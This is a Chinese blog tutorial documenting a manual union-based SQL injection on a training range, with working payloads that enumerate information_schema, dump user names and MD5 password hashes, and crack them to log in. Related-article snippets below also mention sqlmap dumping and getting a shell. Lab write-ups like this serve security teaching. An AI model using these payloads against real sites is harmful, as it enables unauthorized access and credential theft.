实战感受SQL注入(手工注入)

已于 2023-03-19 14:50:19 修改
阅读量2k 收藏 30
点赞数 6
分类专栏: 网络安全 漏洞 文章标签: sql 数据库 php
于 2023-03-18 12:41:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45477063/article/details/129635255
版权

前言

在上篇文章中我们介绍了SQL注入漏洞,并且用简单的php代码,介绍了SQL注入漏洞可能出现的情况和原理。这篇文章就让我们通过实战来感受一下SQL注入。

实战感受SQL注入

墨者学院手工SQL注入

点击WEB安全,点击SQL注入

在这里插入图片描述

我们使用墨者学院的SQL手工注入漏洞测试(MySQL数据库),点击启动靶场环境

image-20230314212037495

访问下方给的IP和端口,或点击 [点击访问]

image-20230318102915358

点击关于平台停机维护

image-20230318103348498

跳转页面后,我们看地址栏中又?id,该处通过GET参数传递

image-20230318103551129

我们在此处可以使用让其出错的方式验证,尝试验证此处参数是否传入后台,并代入数据库查询

在?id=1后面输入 and 1=2

image-20230318103725863

发现页面显示出错,说明此处的参数是有被传入后台并且代入数据库查询

  • 在上篇文章中我们说过不仅可以使用 and 1=2的方式来检测,只要让其出错即可,所以我们在?id=1后面随便输入sdagwogsosn也是ok的

在SQL注入中很经常使用union查询来查询我们想要的信息,但是基于数据库的只是,我们知道当我们使用SQL语句进行查询的时候需要知道有几个字段。

但问题是我们此时进行的是黑盒测试,也就是我们并不知道数据库的结构是什么样子的,那么此时我们该怎么办呢?

在SQL注入中很经常使用order by猜测有几个字段

  • order by [n]
    • order by 1
    • order by 2
  • 直到页面回显不正常,此时我们就能够得知有n-1个字段

我们回到实战中, 我们在?id后面输入 order by 4

image-20230318104727270

发现页面是正常回显,再次在?id后面输入 order by 5

image-20230318104806938

此时发现页面回显不正常,说明字段数就为5-1=4个

当我们知道了字段数之后就可以使用联合查询(union)

由于我们已经知道了有四个字段,所以直接就可以在?id=1后面加上 union select 1,2,3,4

  • 我们猜测他在代码中所写的语句应该是如下:
$id = $_GET["id"];
$sql = "select [四个字段] from [表] where id=$id";

这里的$id就是我们通过GET方式传入的参数

  • 如果当我们传入?id=1 union select 1,2,3,4完整的SQL语句为:select [四个字段] from [表] where id=1 union select 1,2,3,4

image-20230318105723381

发现页面回显正常,紧接着我们使union前的语句为假

  • 可以改变id=-1
  • 也可以在id=1后面加上and 1=2
  • 这里我使用id=-1的方式

image-20230318112642284

我们发现页面回显了2和3。我们可以在union语句后的2和3处填入我们想要查询的信息

  • version():数据库版本
  • database():数据库的名字
  • user():数据库的用户
  • @@version_compile_os:操作系统

将2和3的位置上填入version()和database()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hdfoAM4f-1679114292375)(null)]

发现返回了数据库版本和数据库的名称

再在2和3的输入user()和@@version_compile_os

image-20230318113622669

得到信息:

  • 数据库版本:5.7.22-0ubuntu0.16.04.1
  • 数据库名:mozhe_Discuz_StormGroup
  • 操作系统:Linux
  • 数据库的用户名:root@localhost

当我们拿到这些信息之后可以有进一步的操作,我们可以通过拿到的数据库名进行查看该数据库下的表名

  • 在MySQL中有一些MySQL自带的表,这些表中储存了数据库的一些信息
  • information_shchema中的tables中储存了数据库中的各个表名,并且其存储表名的列名为table_name

我们可以在?id=-1后面输入union select 1,table_name,3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'

  • 被代入SQL语句为:select table_name from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'

在这里插入图片描述

页面中返回了表名,这里只能输出了一个表名,但是不代表这个数据库下只有一张表

我们可以使用group_concat()让其输出所有的表名

在?id=-1后面输入union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'

  • SQL语句为:select group_concat(table_name) from information_schema.tables where table_schema = 'mozhe_Discuz_StormGroup'

image-20230318115118850

我们发现将该数据库下的表名都输出了

  1. StormGroup_member
  2. notice

当我们使用SQL语句进行查询的时候,需要知道表名外还需要知道列名,举个很简单的例子

  • select username from user
  • 上面的SQL语句中我们需要知道user这个表名,此外我们还需要知道username这个列名

所以当我们拿到表名之后,紧接着我们就需要知道列名,才能查询到我们想要的信息

  • information_shcema中的columns存储了各个表中的列名,并且其存储列名的列名为column_name

回顾刚才我们查找到的数据库名,根据数据库名的意思我们发现StormGroup_member存放的应该是用户的信息,更具有价值所以我们优先查询StormGroup_member下的列名信息

在?id=-1后面输入union select 1,column_name,3,4 from information_schema.columns where table_name = 'StormGroup_member'

  • SQL语句为:select column_name from information_schema.columns where table_name = 'StormGroup_member'

image-20230318120600177

我们发现其也只输出了一个列名,所以我们依然可以使用group_concat()让其输出所有的列名

在?id=-1后面输入union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = 'StormGroup_member'

  • SQL语句为:select group_concat(column_name) from information_schema.columns where table_name = 'StormGroup_member'

image-20230318120929962

页面回显除了StormGroup_member表下所有的列名

到此我们就可以使用这些列名查询相关的信息了,我们查询name和password

在?id=-1后面输入union select 1,group_concat(name),group_concat(password) from StormGroup_member

  • 我们知道group_concat()是用来输出所有的数据的,同样我们们也可以使用limit
    • union select 1,name,password,4 from StormGroup_member limit 0,1
      • 0代表从第一个开始
      • 1代表输出一个
    • union select 1,name,password,4 from StormGroup_member limit 1,1
      • 1代表从第二个开始
      • 1代表输出一个
    • union select 1,name,password,4 from StormGroup_member limit 2,1
      • 2代表从第三个开始
      • 1代表输出一个
    • 直到返回异常则表示,没有数据了(到底了)也就是没有数据了
  • 通过此方法也可以输出数据

我们使用group_concat()的方法

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uvpY9maW-1679114292387)(null)]

发现输出了用户名和密码,我们使用其中一组尝试登录

image-20230318121711795发现错误,这时我们想到可能是密码进行了加密,这个加密的方式我们可以看出是md5加密,于是我们访问md5加密解密的网站

搜索md5解密即可

image-20230318121833904

将刚才得到的md5进行解密,得到了密码dsan13

image-20230318122040320

再次返回刚才的登录界面,尝试登陆

image-20230318122221713

发现用户被禁用或不存在用户,不过没关系,刚才我们在获取用户名密码的时候有两组,我们使用另一组,对另一组的密码进行md5解密,再次尝试登录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FXJ2ZW7a-1679114288267)(null)]

成功进入后台,并且拿到了KEY

复制KEY之后返回刚才进入靶场的界面,点击提交KEY

image-20230318122427272

将刚才的KEY复制进去点击确定

image-20230318122450813

弹窗左下角显示KEY正确即为成功

image-20230318122544672

知识点总结

MySQL中的系统库

库:

  • information_shcema

表:

这些库都是在information_schema库中,information_shcema.tables的意思就是information_schema库下的tables表

  • tables:存放数据库中的表信息
  • columns:存放各表中的列名信息

列名:

  • table_name:tables表中存放表名的列名
  • column_name:columns表中存放各个表中列名的列名

MySQL中的一些特殊列

  • version():数据库版本
  • database():数据库的名字
  • user():数据库的用户
  • @@version_compile_os:操作系统

结束语

到此,你就完成了第一次靶场的练习,你感受了SQL手工注入。

希望本文能够帮助到你 😃

本文已同步更新至个人博客:https://www.hibugs.net/security/vulnerability/sql-insert/lamar/sql-insert-hdwrk

Lamar Carpenter
关注
专栏目录
[网络安全提高篇] 一〇六.SQL注入手工注入SQLMAP入门案例详解
杨秀璋的专栏
03-26 1万+
前文带领大家Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。这篇文章将详细介绍SQL注入知识,结合案例对比手工SQL注入SQLMAP的基本用法,案例和基础原理的结合能加深大家对SQL注入的理解。希望这篇文章对您有帮助,更希望帮助更多安全或红蓝对抗的初学者,也推荐大家去使用Cyberbit Range的靶场,且看且珍惜。
Sql注入实战
永不垂头的博客
07-27 1335
学习笔记—Sql注入实战篇 一、编写注入的网页,用于实战。 index.php link.php 在老板火狐中开启hackbar, 进行sql注入。 Google中hackbar破解方法: https://www.fujieace.com/hacker/tools/hackbar.html 二、Sql注入基本流程(实战篇): 输入单引号报如下错误 1=1与1=2的区别:(参考链接: https://www.cnblogs.com/xyz315/p/13043950.html)第一步,判断是否
sql注入实战——thinkPHP
最新发布
Sesessep的博客
08-11 1144
下载thinkPHP文件解压,将framework关键文件放到think-5.0.15中,改名为thinkphp再将think-5.0.15放到WWW文件夹中输入localhost/WWW/think-5.0.15/public/index.php,访问应用入口文件搭建完成。
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
Akuma专栏
04-07 948
刚刚开始学习SQL注入入侵,有写的不对和不好的地方希望各位师哥,师姐们多多指导。在一个供求信息发布的网站上测试了一下,页面Http://www.xxx.com/new/new.asp?id=49我做了如下测试:(1) Http://www.xxx.com/new/new.asp?id=49Microsoft OLE DB Provider for ODBC Drivers 错误 8
[转] sql注入手工注入示例详解
weixin_34293141的博客
12-24 279
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL手工注入实例
01-04
这是一个简单的小实例,供大家学习交流使用,通过简单的模仿使大家对注入技术有所了解,通过一次成功的注入,增加学习的兴趣
sql手工注入实战
mulincong的博客
05-30 2304
sql手工注入封神台靶场
SQL手工注入完全篇
09-08
三、SQL注入实战示例 以经典的登录页面为例,如果输入的用户名和密码没有被正确处理,比如: ```sql SELECT * FROM users WHERE username='$username' AND password='$password' ``` 攻击者可以通过输入`' OR '1'='1...
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5021
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1264
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
SQL注入实战
hxhabcd123的博客
08-28 2512
本文记录各种SQL注入类型的实操过程
sql 注入实战
终日而思不如须臾所学。
11-30 1973
直接开整 // 后端接口 // get my all todos router.post("/api/todo/list", (req, res) => { let { _openid = 'kong', } = { ...req.body } console.log(_openid) const sql = ` select * from todo_today where _openid = '${_openid}' ` sqlQuery(sql,
SQL注入实战
qq_43776408的博客
10-11 202
先开启你的Wampser服务 浏览器输入127.0.0.1检查是否成功 你的sql注入平台安装在c:\wamp\www\sql 浏览器上打开的是c:\wamp\www目录下所有 ////////////////////////////////////////// 1.判断是否存在注入点 python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1...
实战 | SQL注入
zkaqlaoniao的博客
10-30 301
由于传参是需要进行base64编码的,所以此处我们在使用sqlmap的时候需要用到tamper脚本中的base64encode.py脚本,只需要在常规的语句中机上。(7)接下来就是获取其中某一个表的字段名和字段值了,只需将相应的SQL语句进行BASE64编码,然后输入即可。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。我们都知道sql注入的传参有些是明文的,有些是经过编码或者加密的,所以我们搜索的时候不要仅限于。从这两者的反应可以判断出是数字型。
SQL注入实战(一)
木尤的博客
07-10 1086
封神台靶场 https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 查找注入点: sqlmap.py -u http://59.63.200.79:8003/?id=1 查找数据库 sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs 有三个数据库 available databases [3]: [] information_schema [] maoshe [*] test 初步判断是maoshe 查找m
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值